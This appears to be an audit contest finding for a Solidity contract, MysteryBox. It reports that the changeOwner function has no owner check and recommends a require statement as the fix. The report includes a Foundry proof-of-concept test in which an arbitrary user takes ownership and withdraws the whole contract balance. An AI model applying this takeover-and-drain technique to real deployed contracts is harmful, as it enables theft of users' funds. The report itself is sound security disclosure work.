Submission Details
Severity:
Missing Access Control allows anyone to change the owner of the contract and withdraw all funds
Summary
The MysteryBox::changeOwner function does not check if msg.sender is the owner, allowing anyone to call the function.
function changeOwner(address _newOwner) public {
owner = _newOwner;
}
Impact
Anyone can obtain owner privileges and call MysteryBox::withdrawFunds to drain the contract balance.
Proof of Concept
User calls
MysteryBox::changeOwnerwith their own address as parameter.User becomes the owner of the contract.
User calls
MysteryBox::withdrawFunds.All contract balanced is transferred to the user.
Test Code:
function testChangeOwner_AccessControl() public {
vm.prank(user1);
assertEq(mysteryBox.owner(), owner);
mysteryBox.changeOwner(user1);
assertEq(mysteryBox.owner(), user1);
console.log("Contract Balance Before:", address(mysteryBox).balance);
vm.prank(user1);
mysteryBox.withdrawFunds();
console.log("Contract Balance After:", address(mysteryBox).balance);
}
Test Output:
Contract Balance Before: 100000000000000000
Contract Balance After: 0
Tools Used
Manual Review, Foundry
Recommendations
Create a modifier or add a require or if statement to the beginning of the function to check if msg.sender is the owner.
+ require(msg.sender == owner, "Only owner can call this function");
Updates
Appeal created
inallhonesty about 1 year ago
Submission Judgement Published Assigned finding tags:
Anyone can change owner
Rewards breakdown
nSLOC
86This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.